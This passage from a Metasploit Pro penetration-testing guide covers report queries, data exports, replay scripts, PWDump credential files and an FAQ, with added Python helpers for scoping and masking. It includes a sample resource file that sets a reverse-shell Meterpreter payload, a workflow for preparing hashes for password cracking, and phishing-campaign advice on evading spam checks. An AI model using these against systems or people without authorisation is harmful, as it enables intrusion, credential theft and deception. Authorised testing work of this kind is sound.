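LEFT JOIN (SELECT host_id, COUNT(*) AS vuln_count
           FROM vulns GROUP BY host_id) v ON v.host_id = h.id
WHERE h.workspace_id = ?
ORDER BY h.address
"""

# Assumed subset of the Metasploit schema: only the columns the query touches.
SCHEMA = """
CREATE TABLE hosts (id INTEGER PRIMARY KEY, workspace_id INTEGER,
                    address TEXT, name TEXT, os_name TEXT);
CREATE TABLE services (id INTEGER PRIMARY KEY, host_id INTEGER,
                       port INTEGER, proto TEXT, state TEXT, name TEXT);
CREATE TABLE vulns (id INTEGER PRIMARY KEY, host_id INTEGER, name TEXT);
"""

# Constructed sample data: two hosts in workspace 1, one in workspace 2.
SAMPLE_ROWS = {
    "hosts": [(1, 1, "10.0.0.5", "dc01", "Windows 2008"),
              (2, 1, "10.0.0.9", "web01", "Linux"),
              (3, 2, "10.1.0.2", "other", "Linux")],
    "services": [(1, 1, 445, "tcp", "open", "smb"),
                 (2, 1, 3389, "tcp", "open", "rdp"),
                 (3, 2, 80, "tcp", "open", "http")],
    "vulns": [(1, 1, "Sample vulnerability A"),
              (2, 1, "Sample vulnerability B")],
}


def build_sample_db():
    """In-memory SQLite stand-in for the project tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO hosts VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS["hosts"])
    conn.executemany("INSERT INTO services VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS["services"])
    conn.executemany("INSERT INTO vulns VALUES (?, ?, ?)", SAMPLE_ROWS["vulns"])
    conn.commit()
    return conn


def host_summary(conn, workspace_id):
    """Rows of (address, name, os_name, service_count, vuln_count) for one project."""
    return conn.execute(HOST_SUMMARY_SQL, (workspace_id,)).fetchall()


if __name__ == "__main__":
    for row in host_summary(build_sample_db(), 1):
        print(row)
```

In a JRXML template the same SELECT goes into the queryString element with the `?` replaced by a report parameter such as `$P{workspace_id}`, so that the report is scoped to the project it is generated from. Joining hosts directly to both services and vulns and counting would report a host with two services and two vulnerabilities as having four of each; the pre-aggregated subqueries avoid that.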

To download the example template:


1. Open any project.

2. Select Reports > Show Reports from the Project tab bar. The Reports page appears.

3. Scroll to the bottom of the Reports page.

4. Click the Download Example Template link, which is located below the reports table.

The download process starts automatically. If your browser is not configured to download files automatically, a dialog window appears and prompts you to save or run the file. Save the template to your computer.


Exporting Data
A data export enables you to routinely back up project data and create an archive of your tests. When you export data from a project, its contents are copied and saved to a file that can be imported into other projects or shared with other instances of Metasploit Pro. All exports can be downloaded from the Exports area of the web interface or from the exports directory.

Exports Directory
When Metasploit Pro generates an export, it stores a copy of the file in /path/to/Metasploit/apps/pro/exports. The files stored in this directory match the list of exports displayed in the web interface. You can go to the exports directory to download or view exported data; however, you should not make any changes directly to the default exports directory. If you need to modify the export files, make a copy of the exports directory and make your changes in the new directory. Any changes that you make directly to the export files can cause disparities between the metadata that displays for the file in the web interface and the file itself. If you need to remove exports from a project, do it from within the web interface; do not delete them directly from the exports directory. Because XML, ZIP, and PWDump exports can contain plaintext passwords and hashes, treat this directory, and any copy of it, as sensitive.

Viewing Exports Generated with Metasploit Pro 4.8 and Earlier


All exports generated with 4.8 and earlier are stored in /path/to/Metasploit/apps/pro/reports. These exports were created with an older version of Metasploit Pro and were not migrated to the exports directory that was added in Metasploit Pro 4.9. These files will not be listed or accessible from the web interface.

Export Logs
The export log maintains a historical record of all export-related events. Metasploit Pro automatically updates the export log each time you export data from a project. If you experience any issues with an export, you can view the export log to find stack trace errors and troubleshoot them.

Viewing the Export Log


You can find and view the export log in the following directory: /path/to/Metasploit/apps/pro/ui/log. The export log is named exports.log.


Clearing the Export Log


To clear the export log, remove it from the log directory, which is located at /path/to/Metasploit/apps/pro/ui/log. Metasploit Pro generates a new export log if it detects that one does not exist. Note: Before you delete the export log, make a copy of it in case you need it for reference later.

Notification Center Statuses for Exports


The Notification Center alerts you when an export has started, finished, or encountered an error. The Notification Center appears as an icon in the upper-right corner of the global toolbar and turns green when an alert is available for you to review. You can click the Notification Center icon to view a list of notifications for all projects.

The Notification Center displays the following statuses for exports:

- Export started - The export has started.
- Export finished - The export has completed without errors and is ready for you to download. You can click this alert to open the Exports page, which lists all of the export files that have been generated for the project. You can sort by the creation date to find the latest export file.
- Problem with export - There was an issue with the export and it was not able to finish. View the export log to troubleshoot the issue. For more information on export logs, see Export Logs on page 473.

Export Types
Metasploit Pro offers the following export types:

- XML export - An XML file that contains the attributes for most of the objects in a project and can be imported into another project. XML exports are particularly useful if you have a data set that you want to reuse in another project or share with another instance of Metasploit Pro. For example, you can export an XML file of project data if you want to reuse the scan data from a particular project.
- Workspace ZIP - A ZIP file that contains an XML export and any loot files, report files, and task logs. This export type is useful if you want to back up the data and contents of a project or share the project with other instances of Metasploit Pro.
- Replay script - A batch file that reruns tasks that opened sessions on target hosts. A replay script consists of multiple resource files (.rc); Metasploit Pro creates a resource file for each session it opens. You can run a replay script from the Pro console or msfconsole.
- PWDump - A text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. Credentials can be masked so that the file enumerates user names only.

XML Exports
When you export your project as an XML file, it contains most of the data that you see from the Analysis area of a project--with a few exceptions. The exported XML file contains most of the objects in a project's database and their attributes; it does not include any files that are associated with the objects in a project, such as task logs, generated reports, and loot files. When you view the XML export file, you will see the following objects:
- Hosts - Contains the details for each host in the project, including the following attributes: notes, tags, vulnerabilities, credentials, and sessions. It also includes host details, such as the host ID, IP address, MAC address, host name, OS name, OS flavor, OS service pack, and purpose.
- Events - Contains the event log for the project. Each event includes the workspace ID, event creation date, event name, and name of the user who launched the task.
- Sessions - Contains the details for each session obtained in the project, including the following attributes: host ID, session type, module used, session description, port used, and session open/close dates.
- Services - Contains the details for each service discovered in the project, including the service ID, host ID, port number, protocol type, state, service name, creation date, and modification date.
- Credentials - Contains the details for each credential stored in the project, including the credential ID, service ID, user name, password, creation date, and modification date.
- Web sites - Contains the details for each web server discovered, including the website ID, service ID, host address, VHOST address, HTTP port, creation date, and modification date.
- Web pages - Contains the details for each web page discovered, including the web page ID, HTTP response code, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date.
- Web forms - Contains the details for each web form discovered, including the web form ID, form path, request method, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date.
- Web vulnerabilities - Contains the details for each web vulnerability discovered, including the vulnerability category, vulnerability description, vulnerability confidence ranking, request method, vulnerability name, HTTP port, proof text, VHOST address, and vulnerability blame.


Note: Additional attributes may be available for each object; however, this list covers the most common attributes for each object.

Creating an XML Export of Project Data


1. Open the project from which you want to export data.

2. Select Exports > Export Data from the Project tab bar. The Export Data page appears.

3. Select XML Export from the Export Format section.

4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)

5. Define the hosts you want to explicitly include in the Included addresses field. (Optional)

6. Define the hosts you want to explicitly exclude in the Excluded addresses field. (Optional)

7. Select the Mask credentials option from the Export Options section if you do not want to include credentials in the export. Each credential is replaced with **MASKED** in the XML file, and if you later import the file into a project, the credentials are not included.

8. Click the Export Data button. When the export begins, you are taken back to the Exports page, which displays an "Export creation queued" message.


The Notification Center icon turns green and alerts you when the export starts and completes. You can click the Notification Center icon to view a list of system-wide alerts. When the export completes, you can click the notification message or select Exports > Show Exports from the Project tab bar to access the Exports area. When the export is ready, it is listed at the top of the Exports List and uses the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click the Create Date column name to sort the list by descending creation date. If an error occurred and the export was unable to complete, view the export log to identify and troubleshoot the error. For more information on export logs, see Export Logs on page 473.
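The structure described above, as an added example that is not Metasploit Pro's own code: a Python script that reads an XML export, summarizes each host's services and credentials, and applies the same kind of scrubbing as the Mask credentials option by replacing every stored password or hash with **MASKED** before the file is shared. The element names (MetasploitV4, hosts/host, services/service, creds/cred with user and pass children) are assumptions modelled on the export layout and should be checked against an export from your own instance; the document below is constructed sample data, not a real export. The same XML file sits inside a workspace ZIP, so the script applies there too.

```python
import xml.etree.ElementTree as ET

MASK = "**MASKED**"

# Constructed sample export. Element names are assumed (modelled on the export
# layout), not copied from a real Metasploit Pro export.
SAMPLE_EXPORT = """<?xml version="1.0"?>
<MetasploitV4>
  <generated time="2014-03-21 12:00:00 UTC" user="admin" project="demo"/>
  <hosts>
    <host>
      <id>1</id>
      <address>10.0.0.5</address>
      <name>dc01</name>
      <os-name>Windows 2008</os-name>
      <services>
        <service><port>445</port><proto>tcp</proto><state>open</state><name>smb</name></service>
        <service><port>3389</port><proto>tcp</proto><state>open</state><name>rdp</name></service>
      </services>
      <creds>
        <cred><port>445</port><ptype>smb_hash</ptype><user>svc_backup</user>
              <pass>aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</pass></cred>
        <cred><port>445</port><ptype>password</ptype><user>jdoe</user><pass>Winter2014!</pass></cred>
      </creds>
    </host>
    <host>
      <id>2</id>
      <address>10.0.0.9</address>
      <name>web01</name>
      <os-name>Linux</os-name>
      <services>
        <service><port>80</port><proto>tcp</proto><state>open</state><name>http</name></service>
      </services>
      <creds/>
    </host>
  </hosts>
</MetasploitV4>
"""


def summarize(xml_text):
    """One dict per host: address, (port, name) per service, (user, ptype) per credential."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        hosts.append({
            "address": host.findtext("address"),
            "services": [(s.findtext("port"), s.findtext("name")) for s in host.iter("service")],
            "creds": [(c.findtext("user"), c.findtext("ptype")) for c in host.iter("cred")],
        })
    return hosts


def mask_credentials(xml_text):
    """Return (masked XML text, number of secrets replaced). Only <pass> is touched."""
    root = ET.fromstring(xml_text)
    replaced = 0
    for secret in root.iter("pass"):
        if secret.text and secret.text != MASK:
            secret.text = MASK
            replaced += 1
    return ET.tostring(root, encoding="unicode"), replaced


def leaked_secrets(xml_text):
    """Passwords or hashes still present in clear; empty after masking."""
    root = ET.fromstring(xml_text)
    return [p.text for p in root.iter("pass") if p.text and p.text != MASK]


if __name__ == "__main__":
    for host in summarize(SAMPLE_EXPORT):
        print(host)
    masked_xml, count = mask_credentials(SAMPLE_EXPORT)
    print(count, "secrets masked; remaining:", leaked_secrets(masked_xml))
```

The masking here only rewrites pass elements; it does not touch notes, loot, or task logs. When you hand over a workspace ZIP, review the loot directory separately, because the guide notes it holds hashes and SSH keys as files of their own.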

Workspace ZIP
A workspace ZIP contains an XML export, which details the attributes for most of the objects in a project, and any associated directories that contain loot files, report files, and tasks logs. You can export a workspace ZIP to make a copy of a project, its data, and its files. This is useful when you want to back up your findings or when you want to import the data into other projects. When you export a project, Metasploit Pro generates a ZIP file that contains the following:
- Exported XML file - Contains most of the objects in a project, including hosts, services, sessions, credentials, module details, and events.
- Reports directory - Contains all of the generated reports for the project.
- Tasks directory - Contains text files that detail each task run.
- Loot directory - Contains the loot files for the project, including hashes and SSH keys.

Generating a ZIP of the Project


1. Open the project from which you want to export the workspace ZIP.

2. Select Exports > Export Data from the Project tab bar. The Export Data page appears.

3. Choose ZIP Workspace from the Export Format section.

4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)

5. Use the Included addresses field to explicitly define the hosts you want to include in the export. (Optional)

6. Use the Excluded addresses field to explicitly define the hosts you want to exclude from the export. (Optional)

7. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section.

8. Click the Export Data button. When the export begins, you are taken back to the Exports page, which displays an "Export creation queued" message. The Notification Center icon turns green and alerts you when the export starts and completes. You can click the Notification Center icon to view a list of system-wide alerts. When the export completes, you can click the notification message or select Exports > Show Exports from the Project tab bar to access the Exports area.

The ZIP file is listed at the top of the Exports List and uses the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click the Create Date column name to sort the list by descending creation date. If an error occurred and the export was unable to complete, view the export log to identify and troubleshoot the error. For more information on export logs, see Export Logs on page 473.

Replay Scripts
A replay script is a batch file that reruns tasks that opened sessions on target hosts. You can export a replay script to automate successful attacks through the pro console or msfconsole. When you export a replay script, Metasploit Pro creates a resource file for each opened session and compresses them into a ZIP file.


Exporting Replay Scripts


1. Open the project from which you want to export replay scripts.

2. Select Exports > Export Data from the Project tab bar. The Export Data page appears.

3. Choose Replay Scripts from the Export Format section.

4. Use the Included addresses field to explicitly define the hosts you want to include in the replay scripts. (Optional)

5. Use the Excluded addresses field to explicitly define the hosts you want to exclude from the replay scripts. (Optional)

6. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section.

7. Click the Export Data button. When the export begins, you are taken back to the Exports page, which displays an "Export creation queued" message. The Notification Center icon turns green and alerts you when the export starts and completes. You can click the Notification Center icon to view a list of system-wide alerts. When the export completes, you can click the notification message or select Exports > Show Exports from the Project tab bar to access the Exports area. The ZIP file is listed at the top of the Exports List and uses the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click the Create Date column name to sort the list by descending creation date. If an error occurred and the export was unable to complete, view the export log to identify and troubleshoot the error. For more information on export logs, see Export Logs on page 473.

Running the Replay Script with the ProConsole or MSFConsole


To run a replay script, use the resource command, which loads a resource file and runs its commands through the Pro console or msfconsole. The resource command takes the path to the resource file; for example, enter resource /path/to/session_ID_IP.rc to load the replay script and run the commands stored in the file. Review each file before running it: it replays the original attack against the host recorded in it, so confirm that the host is still in scope for the engagement.


Note: Before you can run the resource files, you need to extract them from the ZIP file.
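Before replaying, a practitioner wants to know exactly which hosts and modules the extracted resource files will touch. The following Python script, an added example that is not part of Metasploit Pro, parses the use and set lines of each .rc file and flags any file whose RHOST falls outside the engagement's authorised ranges. The two resource files are constructed samples with a placeholder module path; a real replay script contains whatever commands the original task ran.

```python
import ipaddress
import re

# Constructed sample: two resource files as they might sit inside an exported
# replay ZIP. The module path is a placeholder, not a real Metasploit module.
SAMPLE_RC_FILES = {
    "session_3_10.0.0.5.rc": (
        "use exploit/example/placeholder_module\n"
        "set RHOST 10.0.0.5\n"
        "set RPORT 445\n"
        "set PAYLOAD windows/meterpreter/reverse_tcp\n"
        "set LHOST 10.0.0.100\n"
        "set LPORT 4444\n"
        "exploit -j -z\n"
    ),
    "session_7_10.9.9.9.rc": (
        "use exploit/example/placeholder_module\n"
        "set RHOST 10.9.9.9\n"
        "set RPORT 8080\n"
        "exploit -j -z\n"
    ),
}

USE_RE = re.compile(r"^\s*use\s+(\S+)", re.IGNORECASE)
SET_RE = re.compile(r"^\s*setg?\s+(\S+)\s+(.+?)\s*$", re.IGNORECASE)


def parse_rc(text):
    """Return the module and the option assignments one .rc file would make."""
    module, options = None, {}
    for line in text.splitlines():
        if line.strip().startswith("#"):
            continue                      # comment line, not a console command
        m = USE_RE.match(line)
        if m:
            module = m.group(1)
            continue
        m = SET_RE.match(line)
        if m:
            options[m.group(1).upper()] = m.group(2)
    return {"module": module, "options": options}


def replay_plan(rc_files):
    """Map each file name to (module, RHOST, RPORT) so the plan can be reviewed."""
    plan = {}
    for name, text in rc_files.items():
        parsed = parse_rc(text)
        opts = parsed["options"]
        plan[name] = (parsed["module"], opts.get("RHOST"), opts.get("RPORT"))
    return plan


def out_of_scope(rc_files, allowed_networks):
    """Files whose RHOST is missing, unparsable, or outside the allowed networks."""
    nets = [ipaddress.ip_network(n) for n in allowed_networks]
    flagged = []
    for name, (_module, rhost, _rport) in replay_plan(rc_files).items():
        if rhost is None:
            flagged.append((name, None))
            continue
        try:
            addr = ipaddress.ip_address(rhost)
        except ValueError:                # host name or range: review by hand
            flagged.append((name, rhost))
            continue
        if not any(addr in net for net in nets):
            flagged.append((name, rhost))
    return flagged


if __name__ == "__main__":
    for name, plan in replay_plan(SAMPLE_RC_FILES).items():
        print(name, plan)
    print("out of scope:", out_of_scope(SAMPLE_RC_FILES, ["10.0.0.0/24"]))
```

Run it over the extracted directory before issuing any resource command; a file that is flagged should be left out of the replay, and a file whose RHOST is a host name rather than an address needs a manual check because the parser cannot resolve it.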

PWDumps
A PWDump is a text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. You can export a PWDump file to perform offline password cracking with a tool like John the Ripper.

Exporting a PWDump
1. Open the project from which you want to export data.

2. Select Exports > Export Data from the Project tab bar. The Export Data page appears.

3. Select PWDump from the Export Format section.

4. Use the Included addresses field to explicitly define the hosts you want to include in the export. (Optional)

5. Use the Excluded addresses field to explicitly define the hosts you want to exclude from the export. (Optional)

6. Click the Export Data button. When the export begins, you are taken back to the Exports page. The Notification Center icon turns green and alerts you when the export starts and completes. You can click the Notification Center icon to view a list of system-wide alerts. When the export completes, you can click the notification message or select Exports > Show Exports from the Project tab bar to access the Exports area. The PWDump is listed at the top of the Exports List and uses the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click the Create Date column name to sort the list by descending creation date. If an error occurred and the export was unable to complete, view the export log to identify and troubleshoot the error. For more information on export logs, see Export Logs on page 473.
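As an added example that is not a Metasploit Pro feature, the following Python script parses a PWDump export, turns the NT hashes into lines that John the Ripper reads with --format=NT, and flags the findings worth reporting before any cracking starts: accounts whose NT hash is the hash of the empty password, accounts that still store a real LM hash, and plaintext passwords reused across hosts. The file layout assumed here (a comment line per host and per section, user:id:LM:NT::: lines for hashes, user and password separated by a space for plaintext entries) is modelled on pwdump conventions and should be checked against an export from your own instance. The sample file is constructed; the two hash constants for the empty password are the well-known values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when LM hashes are disabled or the password is empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample in the assumed layout. 8846f7... is the NT hash of "password".
SAMPLE_PWDUMP = """# Metasploit PWDump Export (constructed sample)
#
# LM/NTLM Hashes
#
# 10.0.0.5:445/tcp (smb)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
#
# Plaintext Passwords
#
# 10.0.0.9:22/tcp (ssh)
deploy Winter2014!
# 10.0.0.12:21/tcp (ftp)
deploy Winter2014!
"""

HASH_LINE = re.compile(r"^([^:#\s][^:]*):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")
HOST_LINE = re.compile(r"^#\s+(\S+:\d+/\w+)\s+\((\w+)\)")


def parse_pwdump(text):
    """Return one record per credential: host, user, lm, nt, password."""
    section, host, records = None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            m = HOST_LINE.match(line)
            if m:
                host = m.group(1)          # "address:port/proto" comment that precedes a host's entries
            elif "Hashes" in line:
                section = "hash"
            elif "Plaintext" in line:
                section = "plain"
            elif "SSH" in line:
                section = "ssh"            # keys are multi-line PEM blocks; not parsed here
            continue
        if section == "hash":
            m = HASH_LINE.match(line)
            if m:
                records.append({"host": host, "user": m.group(1), "lm": m.group(3).lower(),
                                "nt": m.group(4).lower(), "password": None})
        elif section == "plain":
            user, _, password = line.partition(" ")
            records.append({"host": host, "user": user, "lm": None, "nt": None,
                            "password": password})
    return records


def nt_hashes_for_john(records):
    """Lines for 'john --format=NT'; empty-password accounts are skipped (nothing to crack)."""
    return [f"{r['user']}:$NT${r['nt']}" for r in records
            if r["nt"] and r["nt"] != EMPTY_NT]


def findings(records):
    """Issues to report without cracking anything."""
    out = []
    reuse = defaultdict(set)
    for r in records:
        if r["nt"] == EMPTY_NT:
            out.append(("empty-password", r["host"], r["user"]))
        if r["lm"] and r["lm"] != EMPTY_LM:
            out.append(("lm-hash-stored", r["host"], r["user"]))   # LM hashes crack in minutes
        if r["password"] is not None:
            reuse[(r["user"], r["password"])].add(r["host"])
    for (user, _pw), hosts in reuse.items():
        if len(hosts) > 1:
            out.append(("password-reuse", ",".join(sorted(hosts)), user))
    return out


if __name__ == "__main__":
    recs = parse_pwdump(SAMPLE_PWDUMP)
    print("\n".join(nt_hashes_for_john(recs)))
    for f in findings(recs):
        print(f)
```

Write the john lines to a file on the cracking host only, and delete both that file and the PWDump export when the engagement ends; the export holds every plaintext password in the project.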


Viewing Exported Data


To see a list of exported data, select Exports >Show Exports from the Project tab bar. The Data Exports list will display all exports associated with the project. You can click on the Download or View link to access each item.


Frequently Asked Questions
The following section provides answers to some of the most commonly asked questions, including:
- How do I restart the Metasploit service on Linux? on page iv
- How do I restart the Metasploit service on Windows? on page v
- I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue? on page ii
- Where do I configure the SMTP settings for my mail server? on page iii
- Why is there a partial blank screen on the video tutorials? on page iv
- How do I generate the diagnostics logs? on page ii
- My targets are behind a NAT gateway. How can I connect to them? on page 1

What does the "Metasploit is initializing" error mean?


The Metasploit is initializing error appears when the Metasploit Web UI cannot reach the Metasploit service. This error typically occurs after you install Metasploit, after you restart the Metasploit service, or after the product hangs and times out. If you recently updated or installed Metasploit, you may need to wait a few minutes for the service to restart. If the service does not restart, you should stop the Metasploit service and restart it.

Linux
For Linux systems, open a command line terminal and run the following command: $ sudo bash /opt/metasploit-<version>/ctlscript.sh restart

Windows
For Windows systems, choose Start > Programs > Metasploit > Services > Stop Services. Then, choose Start > Programs > Metasploit > Services > Start Services to restart the Metasploit service.

How do I generate the diagnostics logs?


To run the diagnostic shell in Windows, select Start > All Programs > Metasploit > Diagnostics Log. Metasploit runs the diagnostics batch file and generates a ZIP file that contains all of the Metasploit logs. You can find the generated ZIP file, called diagnostic-date-time.zip, in /path/to/Metasploit. To run the diagnostic shell in Linux, open a command line terminal and run the following command: sudo /opt/metasploit/diagnostic_logs.sh. You can find the generated ZIP file, called diagnostic-date-time.zip, in /opt/$INSTALL_ROOT. Review the archive before sending it outside your organization, since the logs can contain host names and other details of your engagements.

I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue?
To troubleshoot this issue, look at the task log. To access the task log, click the Tasks tab, find the campaign task, and click the task name. When the task log appears, search for any text highlighted in red; red text indicates that Metasploit encountered an error while processing the task. An error such as Server refused our mail indicates that the mail server could not authenticate the login or could not send the e-mail. Here are some of the most common restrictions that may prevent you from using your mail server to send phishing e-mails:
- Your mail server performs reverse DNS checks and has rejected mail from Metasploit because it thinks that the e-mail is spam. If this is the case, you need to use a mail server that has less restrictive checks for spam, malicious files, and other types of e-mail abuse. Although these checks are in place to keep your e-mail infrastructure secure, they prevent you from sending e-mails from Metasploit Pro.
- The port that you are using to send mail is blocked. The most common port used to send mail is port 25. If this port is blocked, try ports 465, 587, or 2525.
- The mail server is unable to authenticate the login. Check the authentication type configured for your mail server. By default, Metasploit uses the plain auth type. PLAIN authentication sends the credentials unencrypted unless the session is protected by TLS, so use a dedicated, low-privilege mail account for campaigns rather than a personal or administrative one.


Where do I configure the SMTP settings for my mail server?


You can define the SMTP settings through the Global Settings or directly through the campaign. If you define the SMTP settings globally, Metasploit uses the SMTP settings as the default settings for all new campaigns that you create. To define global SMTP settings, select Administration > Global Settings from the Main menu. Find the SMTP Settings and fill out the domain and authentication information.

Nmap 6 is the latest version, so why does the Discovery Scan say that it sweeps with Nmap4 probes ?
Nmap4 does not stand for Nmap version 4. It stands for IPv4.

How do I uninstall Metasploit on Linux?


Uninstalling Metasploit Pro is a two-step process: first stop the Metasploit service, then run the script that removes Metasploit and all of its components. To uninstall Metasploit Pro, open a command line terminal and change the current directory to the Metasploit directory. For example, if you used the default installation directory, type cd Metasploit-4.6.0. After you change the directory, type ./ctlscript.sh stop to stop the Metasploit service, and then type ./uninstall to run the uninstall script.

How do I add a module to Metasploit?


If you are on a Windows machine, browse to C:\metasploit\apps\pro\msf3\modules. If you are on a Linux machine, browse to /opt/metasploit-<version>/apps/pro/msf3/modules. The path of the module must match the directory structure of the Metasploit module tree. For example, to add exploit/multi/browser/firefox_xpi_bootstrapped_addon, browse to C:\metasploit\apps\pro\msf3\modules\exploits\multi\browser and add the module file to that location. After you add a module, open the Metasploit console and type reload_all to refresh your module list. Only add modules from a source you trust: a module is Ruby code that runs with the privileges of the Metasploit service.


Why is there a partial blank screen on the video tutorials?


The Microsoft Patch Tuesday update released on July 9, 2013 causes problems with video playback for large, high quality videos generated with video tools such as Camtasia, Premiere Pro, and MoviePlus. To work around this issue, you need to uninstall the patch associated with MS13-057. Read this article to learn how to uninstall a Microsoft patch. Note that MS13-057 is a security update: removing it leaves the machine exposed to the issue it fixes, so do this only on a machine you can afford to leave unpatched, and reinstall the update when you are done.

How do I launch Metasploit Pro?


To launch the Metasploit Web UI, open a browser and go to https://localhost:3790. If you assigned the Metasploit service a different port, use that port instead of 3790.

Why are some areas of the UI not rendering correctly?


If you recently updated Metasploit Pro, you need to clear your browser's cache before the UI renders correctly.

How often does Metasploit release new exploits?


The Metasploit team releases a weekly update to the Metasploit Framework and Metasploit Pro. The update typically includes bug fixes, small feature enhancements, and new modules. The Metasploit Web UI alerts you when an update is available. If you use msfconsole, you can get the latest modules that have been added to the Metasploit Framework immediately: run msfupdate from the command line to update your local copy of the Metasploit Framework.

What do I do if I exceed the maximum number of license activations?


Single user license keys allow three unique installations. If you have exceeded this number, please contact sales@rapid7.com for assistance.

How do I restart the Metasploit service on Linux?


To restart the Metasploit service, open a command line terminal and run the following command: $ sudo bash /opt/metasploit-<version>/ctlscript.sh restart


How do I restart the Metasploit service on Windows?


First, you need to stop the Metasploit service. To stop the Metasploit service, choose Start > Programs > Metasploit > Services > Stop Services. Now, you can start the Metasploit service. To start the Metasploit service, choose Start > Programs > Metasploit > Services > Start Services.

Where can I find vulnerable targets to use for practice?


Metasploitable and Metasploitable 2 are virtual machines that are available for you to use as practice targets. The virtual machines contain intentionally vulnerable services. You can run tests against the virtual machines to discover the services and exploit the vulnerabilities that exist on them. For example, you can bruteforce Metasploitable to collect passwords from the system.

How do I import a target list into a project?


1. From within a project, click the Campaigns tab.

2. When the campaign management page appears, click the Manage Reusable Resources tab.

3. Click the New Target List button.

4. When the Upload Target List page appears, click the Browse button.

5. Navigate to the location of the CSV file.

6. Select the CSV file and click the Open button.

7. Click the Save button.

How do I export a target list?


1. From within a project, click the Campaigns tab.
2. When the campaign management page appears, click on the Manage Reusable Resources tab.
3. When the Manage Reusable Resources page appears, select the target list that you want to export.
4. Click the Export button.
5. When the Open window appears, choose the Save File option and click OK.

Metasploit Pro exports a CSV of the target list and saves it to your system.


How do I export the campaign findings?


1. From within a project, select Campaigns from the Tasks bar. The Manage Campaigns page appears.
2. Find the campaign that contains the data that you want to export and click the Findings link.
3. Click on the stat bubble that represents the data that you want to export. For example, if you want to export the list of human targets that opened the e-mail, click on the n% recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears.
4. Click the Export Data button.
5. When the Open window appears, choose the Save File option and click OK.

The file saves to the Downloads folder on your system.

How long does it take for Metasploit Pro to update the findings?
Typically, it will take the campaign a few seconds after the human target performs an action to update the Campaign Findings.

How do I view the data that the human target submits?


1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears.
2. Find the campaign whose results you want to view and click the Findings link. The Findings window appears and displays the statistics for the entire campaign.
3. Click on the # of recipients submitted form stat bubble.
4. When the target list appears, click on a human target name to view their campaign history. Any information that they have submitted will be documented on this page.

How can I export the data that the target submits?


Currently, you cannot export the data that the human target submits. However, you can view the data that they have submitted.

1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign whose data you want to view, and click the Findings link.
3. When the Campaign Findings window appears, click on the # of recipients who submitted the form stat bubble.
4. Click on the name of a human target to view their campaign history. Any data that they have submitted will be stored on this page.

Why aren't the findings updating after a human target opens a web page or submits a form?

If the human target is part of another campaign and has already visited a spoofed web page or submitted data, a cookie has already been set in their browser. The human target will have to clear their browser cache in order for the campaign to start tracking them again.

Why aren't the e-mail openings getting tracked?


In order for a campaign to track e-mail openings, the human target must download the images and enable links in the e-mail. Otherwise, the campaign will not be able to track the e-mail opening.

What causes the web server to go down?


The web server will go down if the Pro service is stopped or restarted. The Pro service typically goes down after an update or a system restart.

Why cant I view an image preview of my web pages in the campaigns report?
If you are running Metasploit Pro on a Linux system, you need to install the X virtual frame buffer (Xvfb) package to generate image previews in the campaigns report.

To install the Xvfb package on Ubuntu, open a terminal and run the following command:

$ sudo apt-get install xvfb

To install the Xvfb package on CentOS, open a terminal and run the following command:

$ sudo yum install xorg-x11-server-Xvfb

If you are on Windows, or if you are on Linux with the Xvfb package installed, and the image preview is still not generated, the web page component may use an attack module. If the campaign uses a web page attack, a preview for the web page will not be generated for the report.


How can I access my legacy campaigns?


1. Log in to your instance of Metasploit Pro.
2. When the Projects page appears, click on a project name to open it.
3. Locate the browser address bar.
4. Append /campaigns to the end of the URL and press Enter. The old campaigns area appears.

Can I rerun a MetaModule?


No, you cannot rerun a MetaModule. If you want to rerun a MetaModule, you will need to configure a new MetaModule with the same settings.

How can I view the settings that were used for a MetaModule run?
The Metasploit web interface does not provide a way for you to view the settings that were used for a MetaModule run. However, you can review the generated MetaModule report to see some of the settings, such as the target network range and credentials that were used.

Where can I view the exploit status for a vulnerability?


When you perform vulnerability validation, Metasploit Pro tracks whether or not a vulnerability was successfully exploited. You can view the results from the Vulnerabilities tab (go to Analysis > Hosts > Vulnerabilities). Each vulnerability will have a status of Exploited or Not Exploited.

What are the exploit statuses?


A vulnerability can have one of the following exploit statuses:

Exploited - Metasploit Pro was able to exploit the vulnerability to obtain a session on the target.
Not Exploitable - Metasploit Pro was unable to exploit the vulnerability.

Which versions of Nexpose do I need to perform vulnerability validation?


Nexpose Consultant and Nexpose Enterprise 5.7.16+ can be used with Metasploit Pro for vulnerability validation.

How can I rerun the Vulnerability Validation Wizard using my previous configuration?
Metasploit Pro currently does not provide the ability to rerun tasks created by the Vulnerability Validation Wizard.


How can I view a list of vulnerabilities and their matched exploits?


You can go to the Findings window and click on the Exploit Matches tab. The Findings window displays a table of vulnerabilities and their matching exploits.

